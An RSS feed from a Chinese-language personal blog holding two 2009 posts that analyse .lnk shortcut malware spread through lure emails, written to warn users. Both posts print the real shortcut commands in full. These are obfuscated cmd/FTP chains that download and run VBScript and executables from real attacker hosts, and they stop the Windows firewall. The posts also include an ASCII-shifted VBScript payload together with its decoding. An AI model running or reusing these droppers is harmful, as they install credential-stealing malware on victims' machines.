<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>程式設計 遇上 小提琴 &#187; 病毒</title>
	<atom:link href="http://blog.ez2learn.com/category/%E7%97%85%E6%AF%92/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.ez2learn.com</link>
	<description>Victor&#039;s個人部落格，關於程式設計與小提琴</description>
	<lastBuildDate>Thu, 26 Aug 2010 10:49:41 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>.lnk捷徑檔病毒</title>
		<link>http://blog.ez2learn.com/2009/10/03/shortcut-file-virus/</link>
		<comments>http://blog.ez2learn.com/2009/10/03/shortcut-file-virus/#comments</comments>
		<pubDate>Sat, 03 Oct 2009 10:01:29 +0000</pubDate>
		<dc:creator>victor</dc:creator>
				<category><![CDATA[病毒]]></category>
		<category><![CDATA[.lnk]]></category>
		<category><![CDATA[捷徑檔]]></category>

		<guid isPermaLink="false">http://blog.ez2learn.com/?p=870</guid>
		<description><![CDATA[最近我同學跟我說她的電腦中毒了，我要她把病毒傳給我，所以我才能知道是什麼樣的病毒 跟據她傳來的檔案，很有趣的是，我在今年一月份也有收過類似的病毒信，也有寫了一篇簡單的介紹 : 病毒的花招 捷徑檔，我也有找到一篇文章是在介紹這種病毒 文章連結 : %Lnkget% 而到了現在，這樣的手法似乎有增無減，病毒的形式也有所變化，但是都有明顯的特點，信件內容都是繁體中文的，而主機、域名之類的都是來自中國大陸或台灣，在這背後有集團在運作，他的信件內容是這些 現在還在講露股溝妹ㄉ股溝妹已經落伍了～ 告訴你瞎瞇叫蟑螂妹～ 蟑螂妹 露後臀溝有什麼好大驚小怪ㄉ ! 現在日本都已經在露前蟑螂鬚&#8230;.實在有夠不雅ㄉ 而附加檔案是一個壓縮檔，裡面包著一個捷徑檔 對於一般人而言，對這種東西沒什麼警覺性，一般人都只知道.exe之類的很危險，可是這病毒用的是.lnk，而且他又可以設定看起來相關的圖示，加上內容吸引人，各式各樣的內容都有，有的說是照片，有的說是援交妹，甚至有些說"如何防止帳號被盜"，各種聳動或是引誘使用者去點擊的內容都有，但是一但你點了，下場自然就很慘，你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事，他可能會自動寄類似"我是援交妹，提供全套服務"或是其它類似的內容給你msn或其它網站裡的所有聯絡人，而那些人開了，又會再次的把病毒散播出去，中毒的人肯定會很困擾，以下是一些研究與分析 捷徑檔內容 捷徑檔的內容，像我在一月看到的一樣，是下載惡意程式來執行用的指令，有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現，不同於一月的版本，在這次的版本中，他加了大量的替換變數，來讓指令非常難讀，除此之外，也可能是為了逃避防毒軟體的偵測 他的捷徑目標如下 %ComSpec% /c set q= t t.v&#38;set a=z.c&#38;set p=p.g&#38;set h=p -s:z&#38;set n=echo &#38;echo %n%o ft%p%03%a%om^&#62;z&#62;j&#38;echo %n%aa33^&#62;^&#62;z&#62;&#62;j&#38;echo %n%bb33^&#62;^&#62;z&#62;&#62;j&#38;echo %n%get%q%bs^&#62;^&#62;z&#62;&#62;j&#38;echo %n%bye^&#62;^&#62;z&#62;&#62;j&#38;echo ft%h%&#62;&#62;j&#38;echo start t.vbs&#62;&#62;j&#38;ren j s.bat&#38;call s.bat&#38; 經由整理後它的內容如下 echo echo o ftp.g03z.com^&#62;z&#62;j echo echo aa33^&#62;^&#62;z&#62;&#62;j echo echo bb33^&#62;^&#62;z&#62;&#62;j [...]]]></description>
			<content:encoded><![CDATA[<p>最近我同學跟我說她的電腦中毒了，我要她把病毒傳給我，所以我才能知道是什麼樣的病毒</p>
<p>跟據她傳來的檔案，很有趣的是，我在今年一月份也有收過類似的病毒信，也有寫了一篇簡單的介紹 : <a href="http://blog.ez2learn.com/2009/01/01/virus-lnk-file-trick/">病毒的花招 捷徑檔</a>，我也有找到一篇文章是在介紹這種病毒</p>
<p><a href="http://blogs.technet.com/mmpc/archive/2009/03/03/lnkget.aspx">文章連結 : %Lnkget%</a></p>
<p>而到了現在，這樣的手法似乎有增無減，病毒的形式也有所變化，但是都有明顯的特點，信件內容都是繁體中文的，而主機、域名之類的都是來自中國大陸或台灣，在這背後有集團在運作，他的信件內容是這些</p>
<blockquote><p>現在還在講露股溝妹ㄉ股溝妹已經落伍了～<br />
告訴你瞎瞇叫蟑螂妹～<br />
蟑螂妹<br />
露後臀溝有什麼好大驚小怪ㄉ !<br />
現在日本都已經在露前蟑螂鬚&#8230;.實在有夠不雅ㄉ</p></blockquote>
<p>而附加檔案是一個壓縮檔，裡面包著一個捷徑檔</p>
<p><a href="http://blog.ez2learn.com/wp-content/uploads/2009/10/virus_01.jpg"><img class="alignnone size-full wp-image-871" title="virus_01" src="http://blog.ez2learn.com/wp-content/uploads/2009/10/virus_01.jpg" alt="virus_01" width="166" height="131" /></a></p>
<p>對於一般人而言，對這種東西沒什麼警覺性，一般人都只知道.exe之類的很危險，可是這病毒用的是.lnk，而且他又可以設定看起來相關的圖示，加上內容吸引人，各式各樣的內容都有，有的說是照片，有的說是援交妹，<strong>甚至有些說"如何防止帳號被盜"</strong>，各種聳動或是引誘使用者去點擊的內容都有，但是一但你點了，下場自然就很慘，<strong>你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事</strong>，他可能會自動寄類似"我是援交妹，提供全套服務"或是其它類似的內容給你msn或其它網站裡的所有聯絡人，而那些人開了，又會再次的把病毒散播出去，中毒的人肯定會很困擾，以下是一些研究與分析</p>
<h2>捷徑檔內容</h2>
<p><a href="http://blog.ez2learn.com/wp-content/uploads/2009/10/virus_02.jpg"><img class="alignnone size-medium wp-image-872" title="virus_02" src="http://blog.ez2learn.com/wp-content/uploads/2009/10/virus_02-238x300.jpg" alt="virus_02" width="238" height="300" /></a></p>
<p>捷徑檔的內容，像我在一月看到的一樣，是下載惡意程式來執行用的指令，有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現，不同於一月的版本，在這次的版本中，他加了大量的替換變數，來讓指令非常難讀，除此之外，也可能是為了逃避防毒軟體的偵測</p>
<p>他的捷徑目標如下</p>
<blockquote><p>%ComSpec% /c set q= t t.v&amp;set a=z.c&amp;set p=p.g&amp;set h=p -s:z&amp;set n=echo &amp;echo %n%o ft%p%03%a%om^&gt;z&gt;j&amp;echo %n%aa33^&gt;^&gt;z&gt;&gt;j&amp;echo %n%bb33^&gt;^&gt;z&gt;&gt;j&amp;echo %n%get%q%bs^&gt;^&gt;z&gt;&gt;j&amp;echo %n%bye^&gt;^&gt;z&gt;&gt;j&amp;echo ft%h%&gt;&gt;j&amp;echo start t.vbs&gt;&gt;j&amp;ren j s.bat&amp;call s.bat&amp;</p></blockquote>
<p>經由整理後它的內容如下</p>
<blockquote><p>echo echo o ftp.g03z.com^&gt;z&gt;j<br />
echo echo aa33^&gt;^&gt;z&gt;&gt;j<br />
echo echo bb33^&gt;^&gt;z&gt;&gt;j<br />
echo echo get t t.vbs^&gt;^&gt;z&gt;&gt;j<br />
echo echo bye^&gt;^&gt;z&gt;&gt;j<br />
echo ftp -s:z&gt;&gt;j<br />
echo start t.vbs&gt;&gt;j<br />
ren j s.bat<br />
call s.bat</p></blockquote>
<p>簡單的來說，產生s.bat這個檔案並執行，而s.bat的檔案內容如下</p>
<p>s.bat:</p>
<blockquote><p>echo o ftp.g03z.com&gt;z<br />
echo aa33&gt;&gt;z<br />
echo bb33&gt;&gt;z<br />
echo get t t.vbs&gt;&gt;z<br />
echo bye&gt;&gt;z<br />
ftp -s:z<br />
start t.vbs</p></blockquote>
<p>而這個s.bat又會去同一個ftp伺服器裡下載t.vbs這個檔案，然後執行</p>
<p>t.vbs:</p>
<blockquote><p>sub k<br />
for i=1 to UBound(s)<br />
r=r&amp;chr(s(i)-678)<br />
next<br />
Set kk = CreateObject("Wscript.Shell")<br />
kk.run r,1<br />
end sub<br />
s=array(691,777,787,778,710,725,777,710,788,779,794,710,793,794,789,790,710,793,782,775,792,779,778,775,777,777,779,793,793,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,783,724,783,716,779,777,782,789,710,775,775,729,729,740,740,783,724,783,716,779,777,782,789,710,776,776,729,729,740,740,783,724,783,716,779,777,782,789,710,792,779,777,796,710,778,710,778,724,779,798,779,740,740,783,724,783,716,779,777,782,789,710,776,799,779,740,740,783,724,783,716,780,794,790,710,723,793,736,783,724,783,716,778,779,786,710,783,724,783,716,778,724,779,798,779,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,795,724,795,716,779,777,782,789,710,775,775,729,729,740,740,795,724,795,716,779,777,782,789,710,776,776,729,729,740,740,795,724,795,716,779,777,782,789,710,781,779,794,710,793,710,793,724,779,798,779,740,740,795,724,795,716,779,777,782,789,710,776,799,779,740,740,795,724,795,716,780,794,790,710,723,793,736,795,724,795,716,793,724,779,798,779,716,778,779,786,710,795,724,795,716,778,779,786,710,741,724,796,776,793,716,778,779,786,710,793,724,779,798,779,710,778,724,779,798,779,716,793,794,775,792,794,710,782,794,794,790,736,725,725,776,795,799,724,799,775,782,789,789,724,777,789,787,724,794,797,725,716,778,779,786,710,741,710,741,724,776,775,794)<br />
k</p></blockquote>
<p>它把要執行的指定ascii加過了678放在陣列s中，然後用vbs將指令還原就變成了這樣:</p>
<blockquote><p>cmd /c net stop sharedaccess&amp;echo o www.g03z.com&gt;i.i&amp;echo aa33&gt;&gt;i.i&amp;echo bb33&gt;&gt;i.i&amp;echo recv d d.exe&gt;&gt;i.i&amp;echo bye&gt;&gt;i.i&amp;ftp -s:i.i&amp;del i.i&amp;d.exe&amp;echo o www.g03z.com&gt;u.u&amp;echo aa33&gt;&gt;u.u&amp;echo bb33&gt;&gt;u.u&amp;echo get s s.exe&gt;&gt;u.u&amp;echo bye&gt;&gt;u.u&amp;ftp -s:u.u&amp;s.exe&amp;del u.u&amp;del ?.vbs&amp;del s.exe d.exe&amp;start http://buy.yahoo.com.tw/&amp;del ? ?.bat</p></blockquote>
<p>經整理過後</p>
<blockquote><p>net stop sharedaccess<br />
echo o www.g03z.com&gt;i.i<br />
echo aa33&gt;&gt;i.i<br />
echo bb33&gt;&gt;i.i<br />
echo recv d d.exe&gt;&gt;i.i<br />
echo bye&gt;&gt;i.i<br />
ftp -s:i.i<br />
del i.i<br />
d.exe</p>
<p>echo o www.g03z.com&gt;u.u<br />
echo aa33&gt;&gt;u.u<br />
echo bb33&gt;&gt;u.u<br />
echo get s s.exe&gt;&gt;u.u<br />
echo bye&gt;&gt;u.u<br />
ftp -s:u.u<br />
s.exe</p>
<p>del u.u<br />
del ?.vbs<br />
del s.exe d.exe<br />
start http://buy.yahoo.com.tw/<br />
del ? ?.bat</p></blockquote>
<p>經過了這又臭又長的繞這麼一大圈，在這次下載了d.exe和s.exe才是真正的病毒，兩個檔案並執行，然後刪除之前下載的所有東西，為什麼需要兩個檔案，這點我還沒有研究，接著它會開啟Yahoo! 奇摩拍賣的首頁，我猜他是想讓使用者輸入帳號密碼登入Yahoo!奇摩拍賣，然後先前裝好的病毒在一旁側錄帳號密碼，合理地懷疑，這病毒的目的可能是想偷Yahoo!奇摩拍賣的帳號，然後賣給詐騙集團，又或著這背後的集團本身就是詐騙集團，但也有可能只是想混淆視聽而已</p>
<p>之所以要繞這麼大一圈，我想其目的可能是想避免被研究，而最有趣的地方在於，他們都一直登入一個FTP主機，我們就來研究看看這到底是哪裡來的主機</p>
<h2>來源的研究</h2>
<blockquote><p>註冊商 WHOIS 主機 : whois.paycenter.com.cn</p>
<p>The Data in Paycenter&#8217;s WHOIS database is provided by Paycenter<br />
for information purposes, and to assist persons in obtaining<br />
information about or related to a domain name registration record.<br />
Paycenter does not guarantee its accuracy. By submitting<br />
a WHOIS query, you agree that you will use this Data only<br />
for lawful purposes and that,<br />
under no circumstances will you use this Data to:<br />
(1) allow, enable, or otherwise support the transmission<br />
of mass unsolicited, commercial advertising or solicitations<br />
via e-mail (spam); or<br />
(2) enable high volume, automated, electronic processes that<br />
apply to Paycenter or its systems.<br />
Paycenter reserves the right to modify these terms at any time.<br />
By submitting this query, you agree to abide by this policy.</p>
<p>Domain Name : g03z.com<br />
PunnyCode : g03z.com<br />
Creation Date : 2009-01-08 16:50:39<br />
Updated Date : 2009-01-08 16:50:39<br />
Expiration Date : 2010-01-08 16:50:21</p>
<p>Registrant:<br />
Organization : ggg zzz<br />
Name : zzzzggg<br />
Address : wefwefw wefwefwef<br />
City : 34234234<br />
Province/State : jiangsu<br />
Country : CN<br />
Postal Code : 234234</p>
<p>Administrative Contact:<br />
Name : ggg zzz<br />
Organization : zzzzggg<br />
Address : wefwefw wefwefwef<br />
City : 34234234<br />
Province/State : jiangsu<br />
Country : CN<br />
Postal Code : 234234<br />
Phone Number : 86&#8211;02586883333<br />
Fax : 86&#8211;02586883333<br />
Email : web (a) zgsj.com</p>
<p>Technical Contact:<br />
Name : ggg zzz<br />
Organization : zzzzggg<br />
Address : wefwefw wefwefwef<br />
City : 34234234<br />
Province/State : jiangsu<br />
Country : CN<br />
Postal Code : 234234<br />
Phone Number : 86&#8211;02586883333<br />
Fax : 86&#8211;02586883333<br />
Email : web (a) zgsj.com</p>
<p>Billing Contact:<br />
Name : ggg zzz<br />
Organization : zzzzggg<br />
Address : wefwefw wefwefwef<br />
City : 34234234<br />
Province/State : jiangsu<br />
Country : CN<br />
Postal Code : 234234<br />
Phone Number : 86&#8211;02586883333<br />
Fax : 86&#8211;02586883333<br />
Email : web (a) zgsj.com</p></blockquote>
<p>能得到的就只有是中國註冊的訊息，所有聯絡資料都是亂打的，當然要註冊網域來幹壞事應該沒有人蠢到會寫自己的聯絡資料上去，接著是主機的位置，解析後是</p>
<blockquote><p>202.153.172.43</p></blockquote>
<p>經由whois的資料可以發現，是台灣公司的主機</p>
<blockquote><p>inetnum:      202.153.160.0 &#8211; 202.153.207.255<br />
netname:      UNIGATENET<br />
descr:        UnigateNet, Internet Service Provider,<br />
descr:        Taipei, Taiwan, R.O.C<br />
country:      TW<br />
admin-c:      FC159-AP<br />
tech-c:       CG195-AP<br />
mnt-by:       APNIC-HM<br />
mnt-lower:    MAINT-TW-UNIGATE<br />
remarks:      This object can only be modified by APNIC hostmaster<br />
remarks:      If you wish to modify this object details please<br />
remarks:      send email to hostmaster (at) apnic.net with your organisation<br />
remarks:      account name in the subject line.<br />
status:       ALLOCATED PORTABLE<br />
changed:      hm-changed (at) apnic.net 20031024<br />
changed:      hm-changed (at) apnic.net 20060117<br />
source:       APNIC</p>
<p>person:       Felix Chou<br />
address:      Chief Telecom Inc.<br />
address:      No.250, Yuang Guang St.,<br />
address:      Neihu Chiu, Taipei 114,<br />
address:      Taiwan, R.O.C.<br />
country:      TW<br />
phone:        +886-2-2657-6688<br />
fax-no:       +886-2-2797-2998<br />
e-mail:       felix (at) chief.com.tw<br />
nic-hdl:      FC159-AP<br />
mnt-by:       MAINT-TW-UNIGATE<br />
changed:      noah (at) chief.com.tw 20020715<br />
changed:      mark_lin (at) chief.com.tw 20060127<br />
source:       APNIC</p>
<p>person:       Chief Group<br />
address:      UniGate Telecom Inc.<br />
address:      No.250, Yuang Guang St.,<br />
address:      Neihu Chiu, Taipei 114,<br />
address:      Taiwan, R.O.C.<br />
country:      TW<br />
phone:        +886-2-2657-6688<br />
fax-no:       +886-2-2657-6460<br />
nic-hdl:      CG195-AP<br />
e-mail:       felix_chou (at) chief.com.tw<br />
e-mail:       mark_lin (at) chief.com.tw<br />
e-mail:       apnic_admin (at) chief.com.tw<br />
changed:      mark_lin (at) chief.com.tw 20070521<br />
mnt-by:       MAINT-TW-UNIGATE<br />
source:       APNIC</p></blockquote>
<p>看起來是一家叫<a href="http://www.chief.com.tw">是方電訊</a>的公司，他有提供IDC的服務，另一個公司叫<a href="http://www.unigate.net.tw/">領航電信</a>，不太清楚他們之間是什麼關係，不過看起來應該是被入侵的，直接連到<a href="http://202.55.242.9/">http://202.55.242.9/</a>也是領航電信的網頁，應該沒有笨蛋會拿自己的公司主機來幹壞事，諷刺的是，是方電訊的首頁擺了什麼資安碉堡防護系列的產品，而領航電信的網頁，下面有排跑馬燈這樣寫著</p>
<blockquote><p>間碟軟體對電腦使用者之危害及影響宣導:為防止不肖人士利用間碟軟體竊取格人資料, 請網際網路接取用戶注意間碟軟體對於電腦使用的危害及影響.</p></blockquote>
<p>嘖嘖，一個被入侵了還在賣資安產品，一個還提醒別人間諜軟體的危害，都不知道自己變成了幫兇&#8230;.，我有找到其它提到這些資料的討論，他們說都已經回報了這些公司，不過到了今天一樣還在幫忙散播病毒，真不知道這些公司到底在幹什麼的，開著主機讓人散播病毒</p>
<h2>最後</h2>
<p>我相信在這背後的集團肯定跟詐騙集團有關係，這些.lnk病毒的風格和行為都大同小異，都同樣會透過信件以誘人開啟的內容散播，而且都是以盈利目的，其目的都是為了盜取遊戲的帳號密碼，或是盜取網拍帳密，偷走網拍資料，來供詐騙集團有訂單等資料讓受害者取信</p>
<p>我有想過如何不讓這種事情發生，例如試著攻擊那些提供病毒檔讓人下載的主機，讓他沒有辦法運作，但是安全性是0分的機器何其多，而像上文列出這些公司，不負責任把自己伺服器安全弄好的公司也很多，即使某個伺服器的服務被我阻斷了，在這背後的集團只要換一個伺服器就可以繼續犯案，而指望台灣或是中國大陸能逮到這些人大概也遙遙無期，中國大陸可是網路犯罪的天堂，所以最好的方法還是使用者要知道這些基本的知識，這是所有使用者的責任，為了你點開了病毒把病毒散播出去，可能某個人就因此這輩子的積蓄就此被騙光，你也是幫兇之一，因此，在這個騙子橫行的年代，要有基本的警覺，接著我會寫一篇文章來告訴大家一些基本該知道的知識</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.ez2learn.com/2009/10/03/shortcut-file-virus/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>病毒的花招 捷徑檔</title>
		<link>http://blog.ez2learn.com/2009/01/01/virus-lnk-file-trick/</link>
		<comments>http://blog.ez2learn.com/2009/01/01/virus-lnk-file-trick/#comments</comments>
		<pubDate>Thu, 01 Jan 2009 07:24:20 +0000</pubDate>
		<dc:creator>victor</dc:creator>
				<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://blog.ez2learn.com/?p=449</guid>
		<description><![CDATA[病毒的花招，使用捷徑檔lnk來執行病毒]]></description>
			<content:encoded><![CDATA[<p>前些天收到這封信</p>
<blockquote>
<h2>女性也射精的最新研究</h2>
<p>女性在達到性高潮的一剎那，即陰道充血、膨脹到後期，<br />
陰道平滑肌發生三至六次節律性收縮，會陰及全身的許<br />
多肌群亦同時出現數次控制不住的痙攣性收縮，陰部的<br />
脹滿感瞬間向全身放射，隨著高度的性快感，意識變得<br />
模糊起來，部分女性可發出柔聲輕喚，而極個別女性可<br />
伴有“射精”現象</p></blockquote>
<p>然後附加了一個檔案</p>
<blockquote><p>女性也射精的最新研究.lnk</p></blockquote>
<p>一附就是我是病毒的樣子，看來是某個有我信箱的人中毒自動寄過來的病毒信，有趣的是，看到.lnk我直覺地想應該會開啟某個惡意網站，但是我另存來看看，發現我錯了</p>
<p>他捷徑的目標是這樣</p>
<blockquote><p>"%windir%\system32\cmd.exe /c echo open tloaindm5.2288.org&gt;&gt;t.t&amp;echo 123&gt;&gt;t.t&amp;echo 123&gt;&gt;t.t&amp;echo get down2.bat c:\down2.bat&gt;&gt;t.t&amp;echo get vnet2.vbs %windir%\vnet2.vbs&gt;&gt;t.t&amp;echo bye&gt;&gt;t.t&amp;ftp -s:t.t&amp;del t.t&amp;start %windir%\vnet2.vbs&amp;　　　　　　　　　　　　　　　　　　　　　"</p></blockquote>
<p>後面接了一大串的空白，沒仔細看還以為是空白，原來字都在前面，這病毒還真是奸巧</p>
<p>他的目標執行的東西是這樣</p>
<blockquote><p>echo open tloaindm5.2288.org &gt;&gt; t.t<br />
echo 123&gt;&gt;t.t<br />
echo 123&gt;&gt;t.t<br />
echo get down2.bat c:\down2.bat&gt;&gt;t.t<br />
echo get vnet2.vbs %windir%\vnet2.vbs&gt;&gt;t.t<br />
echo bye&gt;&gt;t.t<br />
ftp -s:t.t<br />
del t.t<br />
start %windir%\vnet2.vbs</p></blockquote>
<p>所以他會建立一個t.t的檔案，然後用ftp指令執行，連到tloaindm5.2288.org接著下載down2.bat，然後是vnet2.vbs，我上去那個被開ftp都不知道的倒霉鬼的ftp站台參觀了一下，它的檔案有這些</p>
<div id="attachment_450" class="wp-caption alignnone" style="width: 310px"><a href="http://blog.ez2learn.com/wp-content/uploads/2009/01/virus_ftp.png"><img class="size-medium wp-image-450" title="病毒FTP的檔案內容" src="http://blog.ez2learn.com/wp-content/uploads/2009/01/virus_ftp-300x206.png" alt="病毒FTP的檔案內容" width="300" height="206" /></a><p class="wp-caption-text">病毒FTP的檔案內容</p></div>
<p>看到lineage.exe，一附就是衝著線上遊戲天堂來的，我猜他可能會把天堂的執行檔給替換掉之類的</p>
<p>沒有仔細繼續研究裡面的東西，有興趣的人自己繼續研究裡面的東西吧，lnk捷徑檔執行病毒的確是蠻有創意的，這年頭什麼檔案看來都不應該相信</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.ez2learn.com/2009/01/01/virus-lnk-file-trick/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
